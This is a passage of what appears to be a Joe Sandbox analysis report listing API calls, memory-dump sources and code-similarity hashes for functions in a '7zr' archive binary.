                                              • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,?,00000000,?), ref: 00D103DA
                                              • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,?), ref: 00D103F0
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastSecurity
                                              • String ID:
                                              • API String ID: 555121230-0
                                              • Opcode ID: 984739d37d42f6b37db2b4f74ed50a0331e9080bbfcce82c37e0ff90fe46d4be
                                              • Instruction ID: 7b282cb2d145735ac6b591deb219d1bf98f70cc0d0903306440972695c5a83c8
                                              • Opcode Fuzzy Hash: 984739d37d42f6b37db2b4f74ed50a0331e9080bbfcce82c37e0ff90fe46d4be
                                              • Instruction Fuzzy Hash: 33313874900209FFDB10EFA4D880BEEBBB5FF48344F148959E466D7251DBB0AA81DB60
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CF8300
                                              • GetFileInformationByHandle.KERNEL32(000000FF,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 00CF834F
                                              • DeviceIoControl.KERNEL32(000000FF,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 00CF837C
                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 00CF839B
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ControlDeviceFileH_prologHandleInformationfreememcpy
                                              • String ID:
                                              • API String ID: 1689166341-0
                                              • Opcode ID: 75a7c82d7f0bdcc06cf3b732fbcd7b92966b89e8f58972a7bb8c07236616df5f
                                              • Instruction ID: 6fad66e34db0e74ed88107da755215cd1386a9400cfcbd4db946498fa373b6e7
                                              • Opcode Fuzzy Hash: 75a7c82d7f0bdcc06cf3b732fbcd7b92966b89e8f58972a7bb8c07236616df5f
                                              • Instruction Fuzzy Hash: D121D376500208AFDF14AF94DC85EFE7BB9EF84740F14002EFA14A72A1CA314E08D675
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: BlockPackSize$BlockUnpackSize
                                              • API String ID: 3519838083-5494122
                                              • Opcode ID: 1947015b59f6615e6246837a08f03826b9a103883406a7859ad18cc0f27558b2
                                              • Instruction ID: 98799bcad271c90561cd8652e346740bc3b02afe46ca0f151016a832e689e353
                                              • Opcode Fuzzy Hash: 1947015b59f6615e6246837a08f03826b9a103883406a7859ad18cc0f27558b2
                                              • Instruction Fuzzy Hash: 8C51D675800684BECF39CBA4C8A1AFE7BA1AF16300F1EC05EE19657195D621D98CE729
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CFA4F8
                                                • Part of subcall function 00CFA384: __EH_prolog.LIBCMT ref: 00CFA389
                                                • Part of subcall function 00CF9E14: GetSystemInfo.KERNEL32(?), ref: 00CF9E36
                                                • Part of subcall function 00CF9E14: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00CF9E50
                                                • Part of subcall function 00CF9E14: GetProcAddress.KERNEL32(00000000), ref: 00CF9E57
                                              • strcmp.MSVCRT ref: 00CFA564
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
                                              • String ID: -
                                              • API String ID: 2798778560-3695764949
                                              • Opcode ID: 23d12d18805aa637dc420640629e4e4d6c62e036ae9d180566a592939ecfea70
                                              • Instruction ID: a3fbe20a7e6d3921b8018f5dfb56371beaea869d88d1fbcc1d0a595206f2e5b4
                                              • Opcode Fuzzy Hash: 23d12d18805aa637dc420640629e4e4d6c62e036ae9d180566a592939ecfea70
                                              • Instruction Fuzzy Hash: A1313772D0020DEACF99FBE0D8529FDF775AF54710F14402AFA1172192DB315A49EA63
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: 0$x
                                              • API String ID: 3519838083-1948001322
                                              • Opcode ID: cdb5312ba5a02f59ee449915cc037bbdd31bbda6af25cb17c3c2e9ef6fe0747d
                                              • Instruction ID: cbb344adc2962136d37a5e71bb0a706936863f5f3eca8994df89e5d01d45a058
                                              • Opcode Fuzzy Hash: cdb5312ba5a02f59ee449915cc037bbdd31bbda6af25cb17c3c2e9ef6fe0747d
                                              • Instruction Fuzzy Hash: 3D216F36D0122DDBCF09EB98D9956EDB7B5FF58304F14006AE901B7281DB756E04CBA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs
                                              • String ID: =
                                              • API String ID: 1795875747-2525689732
                                              • Opcode ID: 5622788360ce0a78189cdd17bda9c7079a3401d91005038d811cf56e39911d3d
                                              • Instruction ID: 23e5b3fd2f33d98ef4393120487108e9cd85b9e1976a8714605391400a053721
                                              • Opcode Fuzzy Hash: 5622788360ce0a78189cdd17bda9c7079a3401d91005038d811cf56e39911d3d
                                              • Instruction Fuzzy Hash: 0BE0DF31A00228EBCF00EBECAC418BE7B69EB843587040823E911D7240EA70D925DBF4
                                              APIs
                                              • memcmp.MSVCRT(?,00DA48A0,00000010), ref: 00D541D6
                                              • memcmp.MSVCRT(?,00DA0168,00000010), ref: 00D541F1
                                              • memcmp.MSVCRT(?,00DA01E8,00000010), ref: 00D54205
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: memcmp
                                              • String ID:
                                              • API String ID: 1475443563-0
                                              • Opcode ID: cc285ac52ac5d6b9c332aadedcb2c5fef08dffc2a74daf2f7c63d8ff1b7aa083
                                              • Instruction ID: f3b88d5e8320a18e61eaf2f234d9041e0610f027f0f667d1f246bf247d454ee2
                                              • Opcode Fuzzy Hash: cc285ac52ac5d6b9c332aadedcb2c5fef08dffc2a74daf2f7c63d8ff1b7aa083
                                              • Instruction Fuzzy Hash: 9A0126313403046BDB106B11CC82FBE77A4DB65751F048438FE85DB281F2B4EAA88375